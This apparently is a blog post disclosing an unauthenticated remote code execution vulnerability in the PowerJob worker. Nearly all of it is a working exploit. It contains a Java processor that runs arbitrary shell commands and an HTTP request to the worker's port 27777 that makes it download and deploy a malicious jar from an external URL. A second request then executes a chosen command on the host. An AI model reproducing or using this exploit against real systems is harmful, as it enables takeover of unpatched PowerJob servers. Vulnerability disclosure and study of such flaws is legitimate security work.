PowerJob worker Unauthorized remote code execution
PowerJob worker has a Unauthorized remote code execution vulnerability.
First,we build a jar with code:
@Component
public class SimpleProcessor implements BasicProcessor {
@Override
public ProcessResult process(TaskContext taskContext) {
OmsLogger omsLogger = taskContext.getOmsLogger();
omsLogger.info("SimpleProcessor start to process, current JobParams is {}.", taskContext.getJobParams());
String command = taskContext.getInstanceParams();
ProcessBuilder builder = new ProcessBuilder();
Process process = null;
try {
if (SystemUtils.IS_OS_WINDOWS) {
process = builder.command("cmd.exe", "/c", command).redirectErrorStream(true).start();
} else {
process = builder.command("sh", "-c", command).redirectErrorStream(true).start();
}
InputStream inputStream = process.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = reader.readLine()) != null) {
omsLogger.info(line);
}
} catch (IOException e) {
throw new RuntimeException(e);
}
return new ProcessResult(true, "simple processor finished with params=" + command);
}
}
Using the maven package command to package the jar, now I have packaged a malicious jar file:
java11 payload
java8 payload
Then send request to worker’s port 27777:
POST /worker/deployContainer HTTP/1.1
content-type: application/json
Content-Length: 163
host: 172.16.27.29:27777
{"containerId":90,"containerName":"rce-demo","version":"bbb","downloadURL":"https://wiz-1251828685.cos.ap-shanghai.myqcloud.com/photos/4736658854a4f045e0ebfc72732ec779.jar"}
bash
Now we can execution code with this request:
POST /worker/runJob HTTP/1.1
content-type: application/json
Content-Length: 550
host: 172.16.27.29:27777
{"allWorkerAddress":["172.16.27.29:27777"],"maxWorkerCount":0,"jobId":46,"wfInstanceId":null,"instanceId":520642210811609408,"executeType":"BROADCAST","processorType":"EXTERNAL","processorInfo":"90#org.example.demo.SimpleProcessor","instanceTimeoutMS":0,"jobParams":"","instanceParams":"open /System/Applications/Calculator.app","threadConcurrency":5,"taskRetryNum":1,"timeExpressionType":"API","timeExpression":null,"maxInstanceNum":0,"alarmConfig":"{\"alertThreshold\":0,\"silenceWindowLen\":0,\"statisticWindowLen\":0}","logConfig":"{\"type\":1}"}
After a few seconds,the command will be execute:
本文链接:
/archives/63
版权声明:
本站所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自
TestNet!
喜欢就支持一下吧